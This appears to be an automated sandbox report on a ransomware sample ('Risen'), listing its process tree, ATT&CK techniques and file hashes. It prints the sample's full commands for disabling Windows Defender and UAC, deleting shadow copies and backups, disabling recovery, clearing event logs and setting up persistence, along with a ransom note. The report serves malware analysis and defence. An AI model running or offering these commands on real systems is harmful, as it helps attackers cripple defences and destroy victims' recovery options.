description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe"C:\Users\Admin\AppData\Local\Temp\risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe"1⤵
- UAC bypass
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2904 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINESoftware\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2100 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINESoftware\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:1396
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2756 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:2116
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3056 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:2440
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2572 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:2548
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2620 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:2384
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2728 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:2452
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:2564
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:2872
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:2956
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:2680
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:2792
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:2600
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:2708
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:2880
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:2456
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:2692
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:2432
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:2228
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2496
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:848
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:2552
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:1656
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2720
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:776
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:2480
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:2312
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:1592
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:2660
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:1816
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:876
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:636
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:2112
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:2648
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:2416
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2520
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:1308
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2644
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:3036
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:2172
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:1232
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:1924
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:1668
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "SystemDefense" /TR "C:\Users\Admin\AppData\Local\Temp\risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe" /F2⤵PID:1932
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "SystemDefense" /TR "C:\Users\Admin\AppData\Local\Temp\risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe" /F3⤵
- Creates scheduled task(s)
PID:1916
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:2864
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:1928
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:2568
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:876
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:2248
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:1252
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:1836
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:320
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:2252
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2016
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:892
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2720
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:2288
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2416
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:2304
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1948
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:2344
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:864
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:2220
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:636
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:1924
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:616
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:1632
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:228
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:2768
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:1592
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:2824
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:204
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "SystemDefense" /F2⤵PID:1820
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "SystemDefense" /F3⤵PID:1488
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:1756
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:1952
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:2084
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:220
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WELCOME " /f2⤵PID:3000
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WELCOME " /f3⤵PID:572
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " We have penetrated your whole network due some critical security issues. We have encrypted all files on each host in the network , We have also Took your critical data AND in case of NO corporation until the end of the deadline we WILL leak or sell your data, the only way to stop this process is successful corporation. ([email protected] , TELEGRAM:@tokyosupp) AND :([email protected]) " /f2⤵PID:1484
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " We have penetrated your whole network due some critical security issues. We have encrypted all files on each host in the network , We have also Took your critical data AND in case of NO corporation until the end of the deadline we WILL leak or sell your data, the only way to stop this process is successful corporation. ([email protected] , TELEGRAM:@tokyosupp) AND :([email protected]) " /f3⤵PID:1268
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:212
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1828
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\$Risen_Note.txt2⤵PID:1824
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\$Risen_Note.txt3⤵PID:2884
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\$Risen_Guide.hta2⤵PID:2324
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\$Risen_Guide.hta"3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2072
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe"2⤵
- Deletes itself
PID:1292 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:1684
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2808
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1732
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2920
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:696
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:2264
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1Scheduled Task/Job
1Windows Management Instrumentation
1Persistence
Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5e635fd1347a924fd60609531bfbc4045
SHA10e6c25bc312217959f79c62ccbf07015976a053f
SHA256ab25453aa274f00bb10f57f48d627516d412e028424e15f2c57d4bdce0be817c
SHA5122c9ce16e1f8e75dd262267202c43b2274a649a39f20087d8cff48c150a6241579dc8f18afad0044c4922433f3d2713790df98614a1475b8af346197cde43d7a5
-
Filesize
1KB
MD55397f97a9140f147d9bf3ca97e2760ec
SHA1d1f4784aa78104bcf259f5b08f6c42b7eb3099ac
SHA2568ec435aba56e3b02775a7522e80becbd5a31452f51aa757dfb5f8a71a2b9dbe1
SHA512ba3ce8af8b5772c0a126fe769999e9c3f0370000be36c5a2001ded8034100db0833e81fe1168a2ce972488ee4b134b615d35bb1bf6bbfae57a94792e1c482277
-
Filesize
7KB
MD50d3aa8b7a53a3d097056b0e2f463ca54
SHA1e7ec53ca2234b5a66f47671a98c09023464c019e
SHA256a5c28c0139743eb9252f36aaf6e5a38effdb163c8fdfa1e5911c3d8a1b1124d3
SHA51213a2a4d72ad9c9d3be41c988c8eee19910d1785ca5d56b9eeb76d2b3dec2f2e4181deaa1f56b99a012d36a08020dfcc8b1bc46f315f9024fe2544e9081bad58c